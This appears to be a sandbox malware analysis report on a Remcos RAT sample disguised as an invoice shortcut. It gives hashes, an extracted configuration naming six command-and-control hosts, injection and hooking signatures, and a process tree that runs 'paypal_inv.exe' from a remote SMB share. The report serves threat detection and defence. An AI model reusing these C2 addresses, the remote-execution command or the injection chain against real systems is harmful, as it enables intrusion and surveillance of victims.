remcos | 79e0fcb3dba988510f42059372ddd0cc77723aba3ed40d7220ca44467e790b6e

General

Target

Invoice.url
Size

198B
MD5

90962de04e13d0f8e7b96a094ec6b77a
SHA1

4907eebd8f643e128a3c597ebe7dd0d302d9ff04
SHA256

b13b262720b806604e486ff0022ac3ebdd2f67484e5c9c53326c8ffde3d7f9a7
SHA512

c2b7d016c170d8adbbce57c17cba32da64ff51527c4b5375bf5f7c885c3033a55e4e859091979e03420a010a9b90cddc31e2c72000732b66fba4904952e2e902

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

listpoints.online:6090

retghrtgwtrgtg.bounceme.net:3839

listpoints.click:7020

datastream.myvnc.com:5225

gservicese.com:2718

center.onthewifi.com:8118

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
explorer.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-BXAQVH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

paypal_inv.exe

description	pid	Process	procid_target
PID 1240 created 3904	1240	paypal_inv.exe	47

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 1 IoCs

Processes:

WebCopier.exe

pid	Process
1904	WebCopier.exe

Loads dropped DLL 1 IoCs

Processes:

WebCopier.exe

pid	Process
1904	WebCopier.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

WebCopier.exe

description	pid	Process	procid_target
PID 1904 set thread context of 2784	1904	WebCopier.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

paypal_inv.exeWebCopier.execmd.exe

pid	Process
1240	paypal_inv.exe
1240	paypal_inv.exe
1904	WebCopier.exe
1904	WebCopier.exe
2784	cmd.exe
2784	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

WebCopier.execmd.exe

pid	Process
1904	WebCopier.exe
2784	cmd.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

paypal_inv.exe

pid	Process
1240	paypal_inv.exe
1240	paypal_inv.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

rundll32.exepaypal_inv.exeWebCopier.execmd.exe

description	pid	Process	procid_target
PID 3904 wrote to memory of 1240	3904	rundll32.exe	87
PID 3904 wrote to memory of 1240	3904	rundll32.exe	87
PID 3904 wrote to memory of 1240	3904	rundll32.exe	87
PID 1240 wrote to memory of 1904	1240	paypal_inv.exe	96
PID 1240 wrote to memory of 1904	1240	paypal_inv.exe	96
PID 1240 wrote to memory of 1904	1240	paypal_inv.exe	96
PID 1904 wrote to memory of 2784	1904	WebCopier.exe	98
PID 1904 wrote to memory of 2784	1904	WebCopier.exe	98
PID 1904 wrote to memory of 2784	1904	WebCopier.exe	98
PID 1904 wrote to memory of 2784	1904	WebCopier.exe	98
PID 2784 wrote to memory of 1860	2784	cmd.exe	104
PID 2784 wrote to memory of 1860	2784	cmd.exe	104
PID 2784 wrote to memory of 1860	2784	cmd.exe	104
PID 2784 wrote to memory of 1860	2784	cmd.exe	104

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Invoice.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3904
- \??\UNC\62.173.141.116\scarica\paypal_inv.exe
  "\\62.173.141.116\scarica\paypal_inv.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1240
- C:\Users\Admin\AppData\Roaming\comChrome_Nfs\WebCopier.exe
  C:\Users\Admin\AppData\Roaming\comChrome_Nfs\WebCopier.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      4⤵
      PID:1860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\22568ba2

Filesize
1.1MB

MD5
f7f347d05f4688863e801cdffbf80538

SHA1
6256c3a1039088b8d385af6a96b487567271321c

SHA256
c987befb13116536067934d95bb07dbe7c44f178f3101515366e7edf5dfc5b2e

SHA512
2629630fb31b901fde9dec1125d7c503db00eb8721c4f0b36389bd9acb63f64ded2867911c01dc0b9aebb9cba41fe9e3af269a3768a6517da7676e6517949eb6

Download Submit
C:\Users\Admin\AppData\Roaming\comChrome_Nfs\WCUtil.dll

Filesize
180KB

MD5
df325be796f564612fad20f093401681

SHA1
e50a37882e04e0670c0d14d5d73f6592bec81552

SHA256
5979955386d91abfd63e7331c0ff5142b3a70221cefbb9e07dd8eaa0ed170f29

SHA512
ae46d39a00ad89ee34396da264135347acf50024ddf5fe27920e757f346d126181d8ef1fa360e0b55f47701782bcee48f5c530eae04f8b08463b2a3243baa146

Download Submit
C:\Users\Admin\AppData\Roaming\comChrome_Nfs\WCUtil.dll

Filesize
180KB

MD5
df325be796f564612fad20f093401681

SHA1
e50a37882e04e0670c0d14d5d73f6592bec81552

SHA256
5979955386d91abfd63e7331c0ff5142b3a70221cefbb9e07dd8eaa0ed170f29

SHA512
ae46d39a00ad89ee34396da264135347acf50024ddf5fe27920e757f346d126181d8ef1fa360e0b55f47701782bcee48f5c530eae04f8b08463b2a3243baa146

Download Submit
C:\Users\Admin\AppData\Roaming\comChrome_Nfs\WebCopier.exe

Filesize
7.2MB

MD5
e2a27870ba4da90df6276c4da9e3cf82

SHA1
cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68

SHA256
9f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2

SHA512
66c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235

Download Submit
C:\Users\Admin\AppData\Roaming\comChrome_Nfs\WebCopier.exe

Filesize
7.2MB

MD5
e2a27870ba4da90df6276c4da9e3cf82

SHA1
cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68

SHA256
9f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2

SHA512
66c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235

Download Submit
C:\Users\Admin\AppData\Roaming\comChrome_Nfs\paralanguage.xlsx

Filesize
925KB

MD5
88f6ebdba373e3ea7218ca40d07b0058

SHA1
e28a68cfd482a8d382497c7ffdb9439dfe46de4e

SHA256
f7e22baa1f846aa30d72f9d3cbfb239faa3eaf767438cdeadc6b8f7e6aa4408a

SHA512
6e36bebda6d036d67f48720d5e78333610ecd5f22cb2d8c8196a14d3611ce6be7f558075c933b5beea79479bf65fb61ffefd366ac694cc77ab0d60d1feca8abe

Download Submit
memory/1240-20-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/1240-5-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/1240-4-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/1240-0-0x0000000000400000-0x0000000000C1A000-memory.dmp

Filesize
8.1MB

Download
memory/1240-2-0x00007FFD2FB50000-0x00007FFD2FD45000-memory.dmp

Filesize
2.0MB

Download
memory/1240-10-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/1240-1-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/1860-35-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-39-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-42-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-41-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-40-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-43-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-38-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-37-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-36-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-31-0x00007FFD2FB50000-0x00007FFD2FD45000-memory.dmp

Filesize
2.0MB

Download
memory/1860-32-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1860-34-0x00000000007E0000-0x0000000000C13000-memory.dmp

Filesize
4.2MB

Download
memory/1904-19-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/1904-17-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/1904-18-0x00007FFD2FB50000-0x00007FFD2FD45000-memory.dmp

Filesize
2.0MB

Download
memory/1904-21-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/2784-27-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/2784-30-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/2784-28-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/2784-23-0x0000000073F80000-0x00000000740FB000-memory.dmp

Filesize
1.5MB

Download
memory/2784-25-0x00007FFD2FB50000-0x00007FFD2FD45000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads